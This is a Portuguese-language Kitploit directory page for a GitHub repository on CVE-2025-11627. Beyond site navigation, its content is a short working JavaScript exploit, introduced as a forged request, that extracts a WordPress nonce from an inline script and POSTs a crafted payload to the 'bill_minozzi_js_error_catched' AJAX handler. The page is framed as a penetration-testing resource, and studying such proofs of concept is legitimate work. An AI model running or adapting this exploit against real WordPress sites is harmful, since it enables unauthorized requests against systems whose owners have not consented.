Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-11627 | Kitploit
Ferramentas/GitHubGitHub/jfriedli/cve-2025-11627
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubjfriedli/cve-2025-11627

CVE-2025-11627

Ver Repositório
há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Envie uma requisição forjada ao manipulador AJAX com o nonce extraído.

root@kitploit:~
(() => {
  // 1) find the inline script that contains the AJAX URL
  const s = [...document.scripts].find(sc => sc.textContent.includes('bill_minozzi_js_error_catched'));
  if (!s) { console.error('Script with ajax URL not found. Is wp_head() present?'); return; }

  // 2) extract the nonce from "...admin-ajax.php?action=bill_minozzi_js_error_catched&_wpnonce=XXXX"
  const m = s.textContent.match(/admin-ajax\.php\?action=bill_minozzi_js_error_catched&_wpnonce=([A-Za-z0-9_-]+)/);
  if (!m) { console.error('Nonce not found in inline script'); return; }
  const NONCE = m[1];

  // 3) send a minimal payload (safe proof)
  fetch('/wordpress/wp-admin/admin-ajax.php', {
    method: 'POST',
    headers: {'Content-Type':'application/x-www-form-urlencoded'},
    body:
      'action=bill_minozzi_js_error_catched' +
      '&_wpnonce=' + encodeURIComponent(NONCE) +
      '&bill_js_error_catched=' + encodeURIComponent('Message: X - URL: http://x.js - Line: 1')
  }).then(r => r.text()).then(t => console.log('Response:', t));
})();
Baixar ferramenta